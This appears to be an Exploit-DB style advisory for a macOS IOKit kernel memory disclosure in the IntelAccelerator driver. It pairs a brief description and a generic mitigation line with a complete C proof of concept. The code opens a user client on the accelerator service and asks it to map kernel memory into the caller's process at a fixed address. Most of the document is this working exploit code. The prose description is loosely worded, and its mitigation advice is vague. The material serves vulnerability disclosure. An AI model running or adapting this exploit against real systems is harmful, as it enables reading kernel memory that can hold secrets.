vendor: Accelerator
by: John Doe

IOKit Kernel Memory Disclosure Vulnerability

This vulnerability allows an attacker to read kernel memory through the IOKit API. The flaw is in the IOServiceOpen() function, which lets an attacker open a connection to a kernel service; the attacker then calls IOConnectMapMemory() on that connection to map kernel memory into user space. The mapped memory can be read directly and may contain sensitive information such as passwords and encryption keys.

Mitigation:

The best mitigation is to ensure that every kernel service is properly secured and that access to it is restricted to authorized users only.

Exploit-DB raw data:

#include <stdio.h>

#include <IOKit/IOKitLib.h>
#include <mach/mach.h>

int main(void){
  kern_return_t err;

  // Look up the IntelAccelerator service. The matching dictionary is
  // consumed (released) by IOServiceGetMatchingServices.
  CFMutableDictionaryRef matching = IOServiceMatching("IntelAccelerator");
  if(!matching){
    printf("unable to create service matching dictionary\n");
    return 0;
  }

  io_iterator_t iterator = IO_OBJECT_NULL;
  err = IOServiceGetMatchingServices(kIOMasterPortDefault, matching, &iterator);
  if (err != KERN_SUCCESS){
    printf("no matches\n");
    return 0;
  }

  // Take the first matching service and release the iterator.
  io_service_t service = IOIteratorNext(iterator);
  IOObjectRelease(iterator);

  if (service == IO_OBJECT_NULL){
    printf("unable to find service\n");
    return 0;
  }
  printf("got service: %x\n", service);

  // Open user client type 2 on the accelerator service.
  io_connect_t conn = MACH_PORT_NULL;
  err = IOServiceOpen(service, mach_task_self(), 2, &conn);
  IOObjectRelease(service);
  if (err != KERN_SUCCESS){
    printf("unable to get user client connection\n");
    return 0;
  }else{
    printf("got userclient connection: %x\n", conn);
  }

  // Ask the user client to map memory type 3 into this task at a
  // caller-chosen address. The original PoC ignores the return value;
  // it is checked here so the outcome is visible. A non-KERN_SUCCESS
  // result means the user client refused the mapping.
  mach_vm_address_t addr = 0x414100000000;
  mach_vm_size_t size = 0x1000;

  err = IOConnectMapMemory(conn, 3, mach_task_self(), &addr, &size, kIOMapAnywhere);
  if (err != KERN_SUCCESS){
    printf("IOConnectMapMemory failed: 0x%x\n", err);
  }else{
    printf("mapped 0x%llx bytes at 0x%llx\n",
           (unsigned long long)size, (unsigned long long)addr);
    IOConnectUnmapMemory(conn, 3, mach_task_self(), addr);
  }

  IOServiceClose(conn);
  return 0;
}